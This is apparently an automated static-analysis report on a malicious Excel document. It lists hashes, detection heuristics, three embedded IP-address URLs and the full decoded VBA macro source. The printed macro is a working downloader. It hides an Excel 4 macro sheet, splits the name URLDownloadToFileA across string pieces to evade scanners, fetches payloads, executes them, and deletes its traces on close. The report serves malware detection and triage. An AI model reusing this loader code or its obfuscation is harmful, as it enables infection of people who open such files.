Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fea0100e24ce67ce…

MALICIOUS

Office (OLE)

133.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-10-14
MD5: fe3ef871fd0e9af6823e1439cae02ba1 SHA-1: d22e8b3552738535d6fe1a2579d9b6f6cd07b7f6 SHA-256: fea0100e24ce67ce44429d52517b711acd3b1299ca44c3177a3da9480a3a3f16
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The file is an Excel document containing VBA macros, including an Auto_Open subroutine. Critical heuristics indicate obfuscated API calls to 'URLDownloadToFile', suggesting the macro's purpose is to download a payload. The embedded URLs are likely sources for this payload. The ClamAV detection name 'Doc.Downloader' further supports this assessment.

Heuristics 6

  • ClamAV: Doc.Downloader.Docusign112100-9908075-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Docusign112100-9908075-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://5.196.247.6/� In document text (OLE body)
    • http://94.140.112.149/In document text (OLE body)
    • http://84.246.85.196//In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3568 bytes
SHA-256: 57dbf314ba8d8e0cd5ae01430a1b3452bf5356fd0c3f739414504ecdf5e48acc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()


End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{D019F920-D807-4C28-8E76-E08AEEA9D280}{8B26FE1D-F797-4308-AC6E-5B76F083A7BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"

Sub auto_open()
Retio


Application.Run Sheets("Niola").Range("H1")

End Sub







Function dfgdf()
Sheets("Niola").Range("H24") = UserForm2.Label1.Caption
Sheets("Niola").Range("H25") = UserForm2.Label3.Caption
Sheets("Niola").Range("H26") = UserForm2.Label4.Caption
End Function



Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Application.ScreenUpdating = False

Excel4IntlMacroSheets.Add.Name = "Niola"
Sheets("Niola").Visible = False
Nyrtyfh
dfgdf
End Function
Sub auto_close()


Pola

End Sub

Function Nyrtyfh()
Sheets("Niola").Range("A1:M100").Font.Color = vbWhite

End Function


Function hkjhjk()
Sheets("Niola").Range("G10") = UserForm2.Label5.Caption
Sheets("Niola").Range("G11") = UserForm2.Label5.Caption & "1"
Sheets("Niola").Range("G12") = UserForm2.Label5.Caption & "2"

End Function


Function Fdjgj()
Sheets("Niola").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Niola").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Niola").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"

End Function

Function Pola()
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Niola").Delete
   Application.DisplayAlerts = True
End Function

Attribute VB_Name = "Module2"
Function Retio()
On Error Resume Next

net = "uRl"
net1 = "Mon"

Bytruy = "R" & "E" & "G" & "I" & "STER"
Neyrey = "="
JRyf = "" & "E" & "" & "X" & "" & "E" & "" & "C"
Loiu = UserForm2.Blost.Caption
jgfjgjfhfhf


Sheets("Niola").Range("K17") = "=N" & "O" & "W()"
Sheets("Niola").Range("K18") = ".d" & "a" & "t"



Sheets("Niola").Range("H35") = "=" & "H" & "ALT()"
Sheets("Niola").Range("I9") = net & net1
Sheets("Niola").Range("I10") = "U" & "RL" & "Do" & "wn" & "lo" & "ad" & "To" & "Fi" & "le" & "A"
Sheets("Niola").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Niola").Range("I12") = "Byukilos"

hkjhjk

Sheets("Niola").Range("I17") = Loiu
Sheets("Niola").Range("I18") = Loiu & "1"
Sheets("Niola").Range("I19") = Loiu & "2"

Fdjgj

Sheets("Niola").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Niola").Range("H17") = Neyrey & JRyf & "(I17)"
Sheets("Niola").Range("H18") = Neyrey & JRyf & "(I18)"
Sheets("Niola").Range("H19") = Neyrey & JRyf & "(I19)"
End Function